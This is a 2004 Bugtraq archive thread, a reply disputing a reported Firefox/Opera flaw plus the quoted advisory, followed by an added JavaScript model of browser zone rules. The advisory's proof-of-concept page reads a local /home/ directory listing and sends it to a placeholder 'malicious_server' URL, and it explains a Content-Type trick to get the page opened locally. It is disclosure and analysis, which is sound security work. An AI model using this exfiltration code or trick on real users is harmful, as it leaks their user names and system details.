
Bugtraqmailing list archives


RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:


From: "Thor Larholm" <thor () pivx com>
Date: Mon, 6 Dec 2004 13:36:57 -0800

This is not a vulnerability, it is expected behavior.

Mozilla shares the same zone design as IE which means that a file from the local file zone can read any other file from the local file zone. You cannot use this approach to read a local file from another zone such as the Internet zone. From the Internet zone, you can also only read the content of files from the same zone, same protocol and same domain.

I agree that Mozilla has implemented quite a lot of proprietary IE extensions which it should not have done, however reading the innerHTML of an element through document.all does not circumvent the traditional zone security checks already in place.

If you can find a cross zone scripting vulnerability in Mozilla this becomes relevant, however in that case you would be better off jumping into a chrome:// document from which you can execute arbitrary commands.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor () pivx com
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6  20CD 5BDB 3D99 4207 AEE9

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
<http://www.pivx.com/qwikfix>

-----Original Message-----
From: Giovanni Delvecchio [mailto:badpenguin79 () hotmail com]
Sent: Wednesday, December 01, 2004 5:15 PM
To: bugtraq () securityfocus com
Subject: Disclosure of file system information in Mozilla Firefox and Opera Browser:

Title: Disclosure of file system information in Mozilla Firefox and Opera Browser

Note:
I don't know if it could be considered really a security problem, anyway I'll try to explain my ideas.
Sorry for my bad English.

Author: Giovanni Delvecchio

Bug: Disclosure of file system information

Applications affected:
- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)
( maybe also previous versions )

Tested versions:
- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51,..7.54 on Linux

Note:
The content of this advisory could be applied also to other browsers, I have checked just Mozilla, Firefox, Opera and Microsoft Internet Explorer. Microsoft Internet Explorer seems not to be affected.

Bug Description:
================
A problem exists in some browsers where a frame can gain access to attributes of another frame or iframe.
An application of this bug could be the possibility to disclose local directory structure.

PoC:
===
------ begin code.htm -----
<html>
<body onLoad="
  list_files = '';
  // collect the href of every link in the local directory listing
  for (i = 0; i < local_files.document.links.length; i++) {
    list_files += local_files.document.links.item(i);
  }
  alert(list_files);
  // send list_files to malicious_server
  document.location.href = 'http://malicious_server/grab.php?list=' + list_files;
">
<iframe name="local_files" src="file:///home/" height=0 width=0></iframe>
</body>
</html>
------ end of code.htm -------

Impact:
======
A malicious server could obtain the content of the /home/ directory ( or C:\Documents and Settings\ for Windows systems ) and so know a set of user names present on the target system.
Moreover, it could be possible to know if a particular program is installed on the target system for a successive attack.
Anyway it cannot be exploited "directly" by a remote site, but only if the page is opened from a local path ( file://localpath/code.htm ), since the iframe "local_files" belongs to a local domain.

Note: with Internet Explorer code.htm doesn't work even locally.

Possible Remote Exploitation:
========================
Question:
How could a malicious remote user exploit it ?

Answer:
After the user "victim" has requested http://malicious_server/code.htm, if malicious_server responds with a page containing an unknown Content-Type field ( for example text/html. , note the dot ), the browser will show a dialog window with some options (open, save, cancel). Choosing "Open" to view this page, it will be downloaded and opened locally; the javascript code will be executed in the local context.
Obviously, if the user chooses to save and afterwards opens it, the result is the same.

(*) For Opera this method of remote exploitation requires that Opera is set as Default Application in "handler for saved files" if the user chooses "Open" in the dialog window.

Solution:
========
No solution at the moment

Vendor notice
==============
24th November 2004: I have contacted Mozilla by security () mozilla org and Opera by its bug track page at https://bugs.opera.com/wizard/
No response from both at the moment.

Best regards,
Giovanni Delvecchio

_________________________________________________________________
Personalizza MSN Messenger con sfondi e fotografie!
http://www.ilovemessenger.msn.it/
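The following is an added example, not code from the advisory or from Thor Larholm's reply. It models the zone rule the reply describes (a document in the local file zone may read any other file:// document; a document in the Internet zone may read only frames of the same zone, same protocol and same host) and applies it to the code.htm PoC, including the "unknown Content-Type, then Open" route from the advisory. The zone names, function names, the constructed /home/ listing, the set of recognised content types and the download path are my own assumptions for the model, not browser internals.

```javascript
// Added example modelling the zone rule from the reply above; not part of the
// original advisory or reply. Names, listing and paths are assumptions.

function zoneOf(urlString) {
  const u = new URL(urlString);
  if (u.protocol === 'file:') return 'local';
  if (u.protocol === 'http:' || u.protocol === 'https:') return 'internet';
  return 'other';
}

// True when script in the document at parentUrl may read the DOM of a frame
// loaded from frameUrl, under the zone model described in the reply.
function canScriptAccess(parentUrl, frameUrl) {
  const parentZone = zoneOf(parentUrl);
  const frameZone = zoneOf(frameUrl);
  if (parentZone !== frameZone) return false;   // never across zones
  if (parentZone === 'local') return true;      // any file:// may read any other file://
  if (parentZone === 'internet') {
    const p = new URL(parentUrl);
    const f = new URL(frameUrl);
    return p.protocol === f.protocol && p.host === f.host;  // host includes the port
  }
  return false;
}

// What the hidden iframe in code.htm points at.
const POC_FRAME = 'file:///home/';

// Constructed stand-in for the links a browser renders in the /home/ listing.
const CONSTRUCTED_LISTING = [
  'file:///home/alice/',
  'file:///home/bob/',
  'file:///home/lost+found/',
];

// Simulates the onLoad handler of code.htm when the page itself was loaded
// from openedFrom: returns the user names the script could collect, or an
// empty list when the frame's document is off limits to it.
function pocLeaks(openedFrom) {
  if (!canScriptAccess(openedFrom, POC_FRAME)) return [];
  return CONSTRUCTED_LISTING.map((href) =>
    href.slice(POC_FRAME.length).replace(/\/$/, ''));
}

// The remote route from the advisory: a page served with a Content-Type the
// browser does not recognise is offered for download; if the user picks Open
// (or Save and then opens the copy) it is loaded from a file:// path and the
// script now runs in the local zone. The recognised-type set and the download
// location are assumptions for the model.
const RECOGNISED_TYPES = new Set(['text/html', 'text/plain', 'application/xhtml+xml']);
const ASSUMED_DOWNLOAD_PATH = 'file:///tmp/code.htm';

function remoteChain(contentType, userChoice) {
  const served = 'http://malicious_server/code.htm';
  const type = contentType.split(';')[0].trim().toLowerCase();
  if (RECOGNISED_TYPES.has(type)) {
    // Rendered directly in the Internet zone: the file:// frame is unreadable.
    return { renderedFrom: served, leaks: pocLeaks(served) };
  }
  if (userChoice !== 'open' && userChoice !== 'save-then-open') {
    return { renderedFrom: null, leaks: [] };
  }
  return { renderedFrom: ASSUMED_DOWNLOAD_PATH, leaks: pocLeaks(ASSUMED_DOWNLOAD_PATH) };
}

// Walk-through when run directly with node.
console.log('opened locally  :', pocLeaks('file:///tmp/code.htm'));
console.log('served over http:', pocLeaks('http://malicious_server/code.htm'));
console.log('text/html. open :', remoteChain('text/html.', 'open'));
```

The point the model makes explicit is the one both messages agree on: served over http:// the PoC collects nothing, because the frame is in a different zone; only once the same file sits on disk and is opened from a file:// path does the script share the local zone with the directory listing.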
